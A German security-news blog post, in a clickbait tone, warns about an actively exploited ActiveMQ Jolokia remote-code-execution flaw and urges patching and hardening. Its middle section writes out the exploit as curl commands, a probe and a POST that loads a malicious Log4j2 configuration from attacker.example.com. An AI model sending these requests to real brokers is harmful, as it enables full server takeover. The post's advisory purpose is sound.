#Netzwerk & Sicherheit · 3 Min. Lesezeit · Tim Rinkel

CISA-ALARM! 13 Jahre alte Super-Lücke in ActiveMQ – Angreifer kapern JETZT Server!

CISA warnt: Apache ActiveMQ CVE-2026-34197 (CVSS 8.8) wird aktiv ausgenutzt. Sofort auf Version 5.19.4 oder 6.2.3 patchen – Frist 30. April 2026.

CISA-ALARM! 13 Jahre alte Super-Lücke in ActiveMQ – Angreifer kapern JETZT Server!

Hinweis: Dieser Artikel enthält Affiliate-Links. Wenn du über diese Links kaufst, erhalten wir eine kleine Provision – für dich entstehen keine Mehrkosten.

HAMMER-WARNUNG von der CISA! Die US-amerikanische Cyber-Behörde hat am 16. April 2026 eine dringende Warnung zu CVE-2026-34197 in Apache ActiveMQ Classic rausgehauen! Die Lücke wird AKTIV in freier Wildbahn ausgenutzt und landete SOFORT im Known Exploited Vulnerabilities Catalog.

US-Bundesbehörden haben bis zum 30. April 2026 Zeit, ihre Systeme zu patchen! Und jetzt festhalten: Die Lücke schlummerte 13 JAHRE unentdeckt im Code!

UNFASSBAR: So brutal funktioniert die Lücke!

CVE-2026-34197 ist eine Remote Code Execution (RCE) in der Jolokia JMX-HTTP-Brücke von Apache ActiveMQ! Der CVSS-Score: 8.8 (Hoch)! Die Sicherheitsforscher von Horizon3.ai beschreiben: Die Lücke war seit 13 Jahren im Code versteckt!

Das Problem sitzt in mangelhafter Eingabevalidierung im Jolokia-Endpunkt unter /api/jolokia/. Über manipulierte HTTP-Anfragen kann ein Angreifer:

  • Den ActiveMQ-Broker dazu zwingen, eine externe Konfigurationsdatei zu laden!
  • BELIEBIGE Betriebssystembefehle auszuführen!
  • Kompletten Server übernehmen!

Doppelt gefährlich: Auf den Versionen 6.0.0 bis 6.1.1 ist die Jolokia-API OHNE Authentifizierung erreichbar (CVE-2024-32114)! Das heißt: UNAUTHENTIFIZIERTES REMOTE CODE EXECUTION – der Albtraum jedes Admins!

SCHOCK: So läuft der Exploit technisch ab!

Jolokia ist eine HTTP/JSON-Brücke für JMX. Praktisch für Monitoring – aber wenn unzureichend gesichert: KATASTROPHE! Der Angriff läuft in zwei Schritten ab:

Schritt 1: Reconnaissance

Der Angreifer prüft, ob der Endpunkt offen ist:

curl -s http://TARGET:8161/api/jolokia/version

Kommt eine JSON-Antwort mit "status":200 zurück? Volltreffer! Der Endpunkt ist erreichbar, keine Auth nötig!

Schritt 2: Exploit-Aufruf

Dann kommt der Schlag:

curl -s -X POST http://TARGET:8161/api/jolokia/ \
  -H "Content-Type: application/json" \
  -d '{
    "type": "exec",
    "mbean": "log4j2:type=*",
    "operation": "setConfigurationLocation",
    "arguments": ["https://attacker.example.com/malicious-log4j2.xml"]
  }'

Die extern geladene Log4j2-Konfigurationsdatei enthält beliebige ScriptEngine-Appender – die DIREKT Betriebssystembefehle ausführen!

Das Ergebnis: Vollständige Remote Code Execution mit den Rechten des ActiveMQ-Prozesses! Typisch läuft ActiveMQ unter dem Nutzer activemq – auf schlecht konfigurierten Systemen mit weitreichenden Rechten! Im SCHLIMMSTEN FALL: Komplette Server-Übernahme!

ACHTUNG: Diese Versionen sind BETROFFEN!

Alle diese ActiveMQ-Versionen sind VERWUNDBAR:

  • Apache ActiveMQ Classic VOR Version 5.19.4
  • Apache ActiveMQ Classic 6.0.0 bis 6.2.2 (vor 6.2.3)

Läuft EINE DIESER VERSIONEN bei dir – egal ob produktiv, im Homelab oder in der Testumgebung – SOFORT AKTUALISIEREN!

MEGA-GEFAHR: Die Angriffe laufen SCHON!

Fortinet FortiGuard Labs hat bereits Dutzende Angriffsversuche auf exponierte Jolokia-Endpunkte dokumentiert! Peak der Aktivität war am 14. April 2026!

Angreifer suchen gezielt nach ActiveMQ-Instanzen mit erreichbarem Management-Endpunkt! Viele Deployments nutzen noch immer Standard-Zugangsdaten – damit ist der Einstieg trivial!

Die CISA-Aufnahme in den KEV Catalog ist KEIN Papiertiger! Sie signalisiert: REALE Angriffe finden STATT!

JETZT HANDELN: So rettest du dein System!

Diese FÜNF Schritte SOFORT umsetzen:

  1. Version prüfen! activemq --version auf dem Server ausführen!
  2. UPDATEN! Auf Apache ActiveMQ Classic 5.19.4 oder 6.2.3 oder neuer!
  3. Jolokia-Endpunkt prüfen! Ist er aus dem Internet erreichbar? Dann DRINGEND einschränken!
  4. Authentifizierung aktivieren! Standard-Credentials entfernen! Starke Passwörter setzen!
  5. Firewall-Rules! Jolokia nur für interne Monitoring-Tools öffnen!

BONUS: So härtest du deine Infrastruktur!

Nach dem Patch gilt: NICHT lockerlassen! Diese vier Extra-Tipps:

  • Network Segmentation – ActiveMQ-Broker gehören NIEMALS direkt ins Internet!
  • Reverse Proxy mit Auth davor – Caddy oder Traefik mit Basic-Auth oder OIDC!
  • Regelmäßige Log-Überprüfung – ungewöhnliche POST-Requests auf /api/jolokia/ melden!
  • Intrusion Detection – Fail2Ban oder Wazuh als zweiter Verteidigungsring!

FAZIT: Patch-Pflicht bis 30. April!

Knallharte Realität: Wer jetzt nicht patcht, riskiert die komplette Server-Übernahme! Die CISA hat gute Gründe für die 14-Tage-Frist – es geht hier um bundesweite kritische Infrastruktur!

Mein Rat: Stopp ALLES, was du gerade tust, und check JETZT deine ActiveMQ-Instanzen! In 15 Minuten ist das Update durch, und du schläfst heute Nacht wieder ruhig!

Auf Lapalutschi.de kommt bald ein großer Guide zu ActiveMQ-Hardening mit Keycloak-Authbleib dran!

Kommentar hinterlassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert